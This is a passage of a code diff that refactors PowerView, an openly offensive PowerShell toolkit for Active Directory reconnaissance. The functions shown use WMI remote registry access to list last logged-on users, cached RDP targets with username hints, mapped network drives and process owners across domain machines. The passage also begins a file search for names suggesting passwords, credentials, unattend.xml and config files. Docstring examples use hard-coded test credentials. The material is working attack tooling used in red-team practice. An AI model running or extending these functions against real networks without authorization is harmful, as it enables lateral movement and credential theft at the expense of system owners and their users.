-        $LastLoggedOn = New-Object PSObject
-        $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
-        $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser
-        $LastLoggedOn
-    }
-    catch {
-        Write-Warning "[!] Error opening remote registry on $Computer. Remote registry likely not enabled."
+                if ($ProxyServer -or $AutoConfigUrl) {
+                    $Out = New-Object PSObject
+                    $Out | Add-Member Noteproperty 'ComputerName' $Computer
+                    $Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer
+                    $Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL
+                    $Out | Add-Member Noteproperty 'Wpad' $Wpad
+                    $Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings')
+                    $Out
+                }
+                else {
+                    Write-Warning "[Get-WMIRegProxy] No proxy settings found for $ComputerName"
+                }
+            }
+            catch {
+                Write-Warning "[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_"
+            }
+        }
     }
 }
 
 
-filter Get-CachedRDPConnection {
+function Get-WMIRegLastLoggedOn {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns the last user who logged onto the local (or a remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
 
-        Uses remote registry functionality to query all entries for the
-        "Windows Remote Desktop Connection Client" on a machine, separated by
-        user and target server.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-        Note: This function requires administrative rights on the
-        machine you're enumerating.
+.DESCRIPTION
 
-    .PARAMETER ComputerName
+This function uses remote registry to enumerate the LastLoggedOnUser registry key
+for the local (or remote) machine.
 
-        The hostname to query for RDP client information.
-        Defaults to localhost.
+.PARAMETER ComputerName
 
-    .PARAMETER Credential
+Specifies the hostname to query for remote registry values (also accepts IP addresses).
+Defaults to 'localhost'.
 
-        A [Management.Automation.PSCredential] object for the remote connection.
+.PARAMETER Credential
 
-    .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
 
-        PS C:\> Get-CachedRDPConnection
+.EXAMPLE
 
-        Returns the RDP connection client information for the local machine.
+Get-WMIRegLastLoggedOn
 
-    .EXAMPLE
+Returns the last user logged onto the local machine.
 
-        PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local
+.EXAMPLE
 
-        Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
 
-    .EXAMPLE
+Returns the last user logged onto WINDOWS1
 
-        PS C:\> Get-CachedRDPConnection -ComputerName WINDOWS2.testlab.local -Credential $Cred
+.EXAMPLE
 
-        Returns the RDP connection client information for the WINDOWS2.testlab.local machine using alternate credentials.
+Get-DomainComputer | Get-WMIRegLastLoggedOn
 
-    .EXAMPLE
+Returns the last user logged onto all machines in the domain.
 
-        PS C:\> Get-NetComputer | Get-CachedRDPConnection
+.EXAMPLE
 
-        Get cached RDP information for all machines in the domain.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.LastLoggedOnUser
+
+A PSCustomObject containing the ComputerName and last loggedon user.
 #>
 
+    [OutputType('PowerView.LastLoggedOnUser')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
+        [String[]]
         $ComputerName = 'localhost',
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # HKEY_LOCAL_MACHINE
+            $HKLM = 2147483650
 
-    # HKEY_USERS
-    $HKU = 2147483651
+            $WmiArguments = @{
+                'List' = $True
+                'Class' = 'StdRegProv'
+                'Namespace' = 'root\default'
+                'Computername' = $Computer
+                'ErrorAction' = 'SilentlyContinue'
+            }
+            if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
 
-    try {
-        if($Credential) {
-            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue
-        }
-        else {
-            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue
+            # try to open up the remote registry key to grab the last logged on user
+            try {
+                $Reg = Get-WmiObject @WmiArguments
+
+                $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI'
+                $Value = 'LastLoggedOnUser'
+                $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue
+
+                $LastLoggedOn = New-Object PSObject
+                $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer
+                $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser
+                $LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser')
+                $LastLoggedOn
+            }
+            catch {
+                Write-Warning "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled."
+            }
         }
+    }
+}
+
+
+function Get-WMIRegCachedRDPConnection {
+<#
+.SYNOPSIS
+
+Returns information about RDP connections outgoing from the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: ConvertFrom-SID  
+
+.DESCRIPTION
+
+Uses remote registry functionality to query all entries for the
+"Windows Remote Desktop Connection Client" on a machine, separated by
+user and target server.
+
+.PARAMETER ComputerName
+
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
+
+.PARAMETER Credential
 
-        # extract out the SIDs of domain users in this hive
-        $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
 
-        foreach ($UserSID in $UserSIDs) {
+.EXAMPLE
+
+Get-WMIRegCachedRDPConnection
+
+Returns the RDP connection client information for the local machine.
+
+.EXAMPLE
+
+Get-WMIRegCachedRDPConnection  -ComputerName WINDOWS2.testlab.local
+
+Returns the RDP connection client information for the WINDOWS2.testlab.local machine
+
+.EXAMPLE
+
+Get-DomainComputer | Get-WMIRegCachedRDPConnection
+
+Returns cached RDP information for all machines in the domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.CachedRDPConnection
+
+A PSCustomObject containing the ComputerName and cached RDP information.
+#>
+
+    [OutputType('PowerView.CachedRDPConnection')]
+    [CmdletBinding()]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
+        [ValidateNotNullOrEmpty()]
+        [String[]]
+        $ComputerName = 'localhost',
+
+        [Management.Automation.PSCredential]
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
+    )
+
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # HKEY_USERS
+            $HKU = 2147483651
+
+            $WmiArguments = @{
+                'List' = $True
+                'Class' = 'StdRegProv'
+                'Namespace' = 'root\default'
+                'Computername' = $Computer
+                'ErrorAction' = 'Stop'
+            }
+            if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
 
             try {
-                $UserName = Convert-SidToName $UserSID
+                $Reg = Get-WmiObject @WmiArguments
 
-                # pull out all the cached RDP connections
-                $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames
+                # extract out the SIDs of domain users in this hive
+                $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
 
-                foreach ($Connection in $ConnectionKeys) {
-                    # make sure this key is a cached connection
-                    if($Connection -match 'MRU.*') {
-                        $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue
-                        
-                        $FoundConnection = New-Object PSObject
-                        $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
-                        $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
-                        $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
-                        $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer
-                        $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null
-                        $FoundConnection
-                    }
-                }
+                ForEach ($UserSID in $UserSIDs) {
+                    try {
+                        if ($PSBoundParameters['Credential']) {
+                            $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
+                        }
+                        else {
+                            $UserName = ConvertFrom-SID -ObjectSid $UserSID
+                        }
 
-                # pull out all the cached server info with username hints
-                $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames
+                        # pull out all the cached RDP connections
+                        $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames
+
+                        ForEach ($Connection in $ConnectionKeys) {
+                            # make sure this key is a cached connection
+                            if ($Connection -match 'MRU.*') {
+                                $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue
+
+                                $FoundConnection = New-Object PSObject
+                                $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
+                                $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
+                                $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
+                                $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer
+                                $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null
+                                $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
+                                $FoundConnection
+                            }
+                        }
 
-                foreach ($Server in $ServerKeys) {
+                        # pull out all the cached server info with username hints
+                        $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames
 
-                    $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue
-                    
-                    $FoundConnection = New-Object PSObject
-                    $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
-                    $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
-                    $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
-                    $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server
-                    $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint
-                    $FoundConnection   
-                }
+                        ForEach ($Server in $ServerKeys) {
+
+                            $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue
 
+                            $FoundConnection = New-Object PSObject
+                            $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer
+                            $FoundConnection | Add-Member Noteproperty 'UserName' $UserName
+                            $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID
+                            $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server
+                            $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint
+                            $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection')
+                            $FoundConnection
+                        }
+                    }
+                    catch {
+                        Write-Verbose "[Get-WMIRegCachedRDPConnection] Error: $_"
+                    }
+                }
             }
             catch {
-                Write-Verbose "Error: $_"
+                Write-Warning "[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
             }
         }
-
-    }
-    catch {
-        Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
     }
 }
 
 
-filter Get-RegistryMountedDrive {
+function Get-WMIRegMountedDrive {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns information about saved network mounted drives for the local (or remote) machine.
+
+Note: This function requires administrative rights on the machine you're enumerating.
+
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: ConvertFrom-SID  
 
-        Uses remote registry functionality to query all entries for the
-        the saved network mounted drive on a machine, separated by
-        user and target server.
+.DESCRIPTION
 
-        Note: This function requires administrative rights on the
-        machine you're enumerating.
+Uses remote registry functionality to enumerate recently mounted network drives.
 
-    .PARAMETER ComputerName
+.PARAMETER ComputerName
 
-        The hostname to query for RDP client information.
-        Defaults to localhost.
+Specifies the hostname to query for mounted drive information (also accepts IP addresses).
+Defaults to 'localhost'.
 
-    .PARAMETER Credential
+.PARAMETER Credential
 
-        A [Management.Automation.PSCredential] object for the remote connection.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connecting to the remote system.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-RegistryMountedDrive
+Get-WMIRegMountedDrive
 
-        Returns the saved network mounted drives for the local machine.
+Returns the saved network mounted drives for the local machine.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local
+Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
 
-        Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
+Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-RegistryMountedDrive -ComputerName WINDOWS2.testlab.local -Credential $Cred
+Get-DomainComputer | Get-WMIRegMountedDrive
 
-        Returns the saved network mounted drives for the WINDOWS2.testlab.local machine using alternate credentials.
+Returns the saved network mounted drives for all machines in the domain.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Get-NetComputer | Get-RegistryMountedDrive
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
 
-        Get the saved network mounted drives for all machines in the domain.
+.OUTPUTS
+
+PowerView.RegMountedDrive
+
+A PSCustomObject containing the ComputerName and mounted drive information.
 #>
 
+    [OutputType('PowerView.RegMountedDrive')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
+        [String[]]
         $ComputerName = 'localhost',
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
-
-    # HKEY_USERS
-    $HKU = 2147483651
-
-    try {
-        if($Credential) {
-            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -Credential $Credential -ErrorAction SilentlyContinue
-        }
-        else {
-            $Reg = Get-WmiObject -List 'StdRegProv' -Namespace root\default -Computername $Computer -ErrorAction SilentlyContinue
-        }
-
-        # extract out the SIDs of domain users in this hive
-        $UserSIDs = ($Reg.EnumKey($HKU, "")).sNames | ? { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            # HKEY_USERS
+            $HKU = 2147483651
 
-        foreach ($UserSID in $UserSIDs) {
+            $WmiArguments = @{
+                'List' = $True
+                'Class' = 'StdRegProv'
+                'Namespace' = 'root\default'
+                'Computername' = $Computer
+                'ErrorAction' = 'Stop'
+            }
+            if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
 
             try {
-                $UserName = Convert-SidToName $UserSID
+                $Reg = Get-WmiObject @WmiArguments
 
-                $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames
+                # extract out the SIDs of domain users in this hive
+                $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' }
 
-                ForEach($DriveLetter in $DriveLetters) {
-                    $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue
-                    $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue
-                    $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue
-                    if(-not $UserName) { $UserName = '' }
+                ForEach ($UserSID in $UserSIDs) {
+                    try {
+                        if ($PSBoundParameters['Credential']) {
+                            $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential
+                        }
+                        else {
+                            $UserName = ConvertFrom-SID -ObjectSid $UserSID
+                        }
 
-                    if($RemotePath -and ($RemotePath -ne '')) {
-                        $MountedDrive = New-Object PSObject
-                        $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer
-                        $MountedDrive | Add-Member Noteproperty 'UserName' $UserName
-                        $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID
-                        $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter
-                        $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName
-                        $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath
-                        $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName
-                        $MountedDrive
+                        $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames
+
+                        ForEach ($DriveLetter in $DriveLetters) {
+                            $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue
+                            $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue
+                            $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue
+                            if (-not $UserName) { $UserName = '' }
+
+                            if ($RemotePath -and ($RemotePath -ne '')) {
+                                $MountedDrive = New-Object PSObject
+                                $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer
+                                $MountedDrive | Add-Member Noteproperty 'UserName' $UserName
+                                $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID
+                                $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter
+                                $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName
+                                $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath
+                                $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName
+                                $MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive')
+                                $MountedDrive
+                            }
+                        }
+                    }
+                    catch {
+                        Write-Verbose "[Get-WMIRegMountedDrive] Error: $_"
                     }
                 }
             }
             catch {
-                Write-Verbose "Error: $_"
+                Write-Warning "[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
             }
         }
     }
-    catch {
-        Write-Warning "Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_"
-    }
 }
 
 
-filter Get-NetProcess {
+function Get-WMIProcess {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Returns a list of processes and their owners on the local or remote machine.
 
-        Gets a list of processes/owners on a remote machine.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: None  
 
-    .PARAMETER ComputerName
+.DESCRIPTION
 
-        The hostname to query processes. Defaults to the local host name.
+Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
+including the owners of the particular process.
 
-    .PARAMETER Credential
+.PARAMETER ComputerName
 
-        A [Management.Automation.PSCredential] object for the remote connection.
+Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
+Defaults to 'localhost'.
 
-    .EXAMPLE
+.PARAMETER Credential
 
-        PS C:\> Get-NetProcess -ComputerName WINDOWS1
-    
-        Returns the current processes for WINDOWS1
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the remote system.
+
+.EXAMPLE
+
+Get-WMIProcess -ComputerName WINDOWS1
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
+
+.OUTPUTS
+
+PowerView.UserProcess
+
+A PSCustomObject containing the remote process information.
 #>
 
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.UserProcess')]
     [CmdletBinding()]
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [Alias('HostName')]
-        [Object[]]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [Alias('HostName', 'dnshostname', 'name')]
         [ValidateNotNullOrEmpty()]
-        $ComputerName = [System.Net.Dns]::GetHostName(),
+        [String[]]
+        $ComputerName = 'localhost',
 
         [Management.Automation.PSCredential]
-        $Credential
+        [Management.Automation.CredentialAttribute()]
+        $Credential = [Management.Automation.PSCredential]::Empty
     )
 
-    # extract the computer name from whatever object was passed on the pipeline
-    $Computer = $ComputerName | Get-NameField
-
-    try {
-        if($Credential) {
-            $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName -Credential $Credential
-        }
-        else {
-            $Processes = Get-WMIobject -Class Win32_process -ComputerName $ComputerName
-        }
-
-        $Processes | ForEach-Object {
-            $Owner = $_.getowner();
-            $Process = New-Object PSObject
-            $Process | Add-Member Noteproperty 'ComputerName' $Computer
-            $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName
-            $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID
-            $Process | Add-Member Noteproperty 'Domain' $Owner.Domain
-            $Process | Add-Member Noteproperty 'User' $Owner.User
-            $Process                
+    PROCESS {
+        ForEach ($Computer in $ComputerName) {
+            try {
+                $WmiArguments = @{
+                    'ComputerName' = $ComputerName
+                    'Class' = 'Win32_process'
+                }
+                if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential }
+                Get-WMIobject @WmiArguments | ForEach-Object {
+                    $Owner = $_.getowner();
+                    $Process = New-Object PSObject
+                    $Process | Add-Member Noteproperty 'ComputerName' $Computer
+                    $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName
+                    $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID
+                    $Process | Add-Member Noteproperty 'Domain' $Owner.Domain
+                    $Process | Add-Member Noteproperty 'User' $Owner.User
+                    $Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess')
+                    $Process
+                }
+            }
+            catch {
+                Write-Verbose "[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_"
+            }
         }
     }
-    catch {
-        Write-Verbose "[!] Error enumerating remote processes on $Computer, access likely denied: $_"
-    }
 }
 
 
 function Find-InterestingFile {
 <#
-    .SYNOPSIS
+.SYNOPSIS
+
+Searches for files on the given path that match a series of specified criteria.
 
-        This function recursively searches a given UNC path for files with
-        specific keywords in the name (default of pass, sensitive, secret, admin,
-        login and unattend*.xml). The output can be piped out to a csv with the
-        -OutFile flag. By default, hidden files/folders are included in search results.
+Author: Will Schroeder (@harmj0y)  
+License: BSD 3-Clause  
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection  
 
-    .PARAMETER Path
+.DESCRIPTION
 
-        UNC/local path to recursively search.
+This function recursively searches a given UNC path for files with
+specific keywords in the name (default of pass, sensitive, secret, admin,
+login and unattend*.xml). By default, hidden files/folders are included
+in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
+is used to temporarily map the remote share.
 
-    .PARAMETER Terms
+.PARAMETER Path
 
-        Terms to search for.
+UNC/local path to recursively search.
 
-    .PARAMETER OfficeDocs
+.PARAMETER Include
 
-        Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
+Only return files/folders that match the specified array of strings,
+i.e. @(*.doc*, *.xls*, *.ppt*)
 
-    .PARAMETER FreshEXEs
+.PARAMETER LastAccessTime
 
-        Switch. Find .EXEs accessed within the last week.
+Only return files with a LastAccessTime greater than this date value.
 
-    .PARAMETER LastAccessTime
+.PARAMETER LastWriteTime
 
-        Only return files with a LastAccessTime greater than this date value.
+Only return files with a LastWriteTime greater than this date value.
 
-    .PARAMETER LastWriteTime
+.PARAMETER CreationTime
 
-        Only return files with a LastWriteTime greater than this date value.
+Only return files with a CreationTime greater than this date value.
 
-    .PARAMETER CreationTime
+.PARAMETER OfficeDocs
 
-        Only return files with a CreationTime greater than this date value.
+Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
 
-    .PARAMETER ExcludeFolders
+.PARAMETER FreshEXEs
 
-        Switch. Exclude folders from the search results.
+Switch. Find .EXEs accessed within the last 7 days.
 
-    .PARAMETER ExcludeHidden
+.PARAMETER ExcludeFolders
 
-        Switch. Exclude hidden files and folders from the search results.
+Switch. Exclude folders from the search results.
 
-    .PARAMETER CheckWriteAccess
+.PARAMETER ExcludeHidden
 
-        Switch. Only returns files the current user has write access to.
+Switch. Exclude hidden files and folders from the search results.
 
-    .PARAMETER OutFile
+.PARAMETER CheckWriteAccess
 
-        Output results to a specified csv output file.
+Switch. Only returns files the current user has write access to.
 
-    .PARAMETER UsePSDrive
+.PARAMETER Credential
 
-        Switch. Mount target remote path with temporary PSDrives.
+A [Management.Automation.PSCredential] object of alternate credentials
+to connect to remote systems for file enumeration.
 
-    .OUTPUTS
+.EXAMPLE
 
-        The full path, owner, lastaccess time, lastwrite time, and size for each found file.
+Find-InterestingFile -Path "C:\Backup\"
 
-    .EXAMPLE
+Returns any files on the local path C:\Backup\ that have the default
+search term set in the title.
 
-        PS C:\> Find-InterestingFile -Path C:\Backup\
-        
-        Returns any files on the local path C:\Backup\ that have the default
-        search term set in the title.
+.EXAMPLE
 
-    .EXAMPLE
+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
 
-        PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -Terms salaries,email -OutFile out.csv
-        
-        Returns any files on the remote path \\WINDOWS7\Users\ that have 'salaries'
-        or 'email' in the title, and writes the results out to a csv file
-        named 'out.csv'
+Returns any files on the remote path \\WINDOWS7\Users\ that have the default
+search term set in the title and were accessed within the last week.
 
-    .EXAMPLE
+.EXAMPLE
 
-        PS C:\> Find-InterestingFile -Path \\WINDOWS7\Users\ -LastAccessTime (Get-Date).AddDays(-7)
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingFile -Credential $Cred -Path "\\PRIMARY.testlab.local\C$\Temp\"
 
-        Returns any files on the remote path \\WINDOWS7\Users\ that have the default
-        search term set in the title and were accessed within the last week.
+.OUTPUTS
 
-    .LINK
-        
-        http://www.harmj0y.net/blog/redteaming/file-server-triage-on-red-team-engagements/
+PowerView.FoundFile
 #>
-    
-    param(
-        [Parameter(ValueFromPipeline=$True)]
-        [String]
-        $Path = '.\',
 
-        [Alias('Terms')]
+    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+    [OutputType('PowerView.FoundFile')]
+    [CmdletBinding(DefaultParameterSetName = 'FileSpecification')]
+    Param(
+        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+        [ValidateNotNullOrEmpty()]
         [String[]]
-        $SearchTerms = @('pass', 'sensitive', 'admin', 'login', 'secret', 'unattend*.xml', '.vmdk', 'creds', 'credential', '.config'),
-
-        [Switch]
-        $OfficeDocs,
+        $Path = '.\',
 
-        [Switch]
-        $FreshEXEs,
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [Alias('SearchTerms', 'Terms')]
+        [String[]]
+        $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'),
 
-        [String]
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
         $LastAccessTime,
 
-        [String]
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
         $LastWriteTime,
 
-        [String]
+        [Parameter(ParameterSetName = 'FileSpecification')]
+        [ValidateNotNullOrEmpty()]
+        [DateTime]
         $CreationTime,
 
+        [Parameter(ParameterSetName = 'OfficeDocs')]
+        [Switch]
+        $OfficeDocs,
+
+        [Parameter(ParameterSetName = 'FreshEXEs')]
+        [Switch]
+        $FreshEXEs,
+
+        [Parameter(ParameterSetName = 'FileSpecification')]
         [Switch]
         $ExcludeFolders,
 
+        [Parameter(ParameterSetName = 'FileSpecification')]
         [Switch]
         $ExcludeHidden,
 
         [Switch]
         $CheckWriteAccess,
 
-        [String]
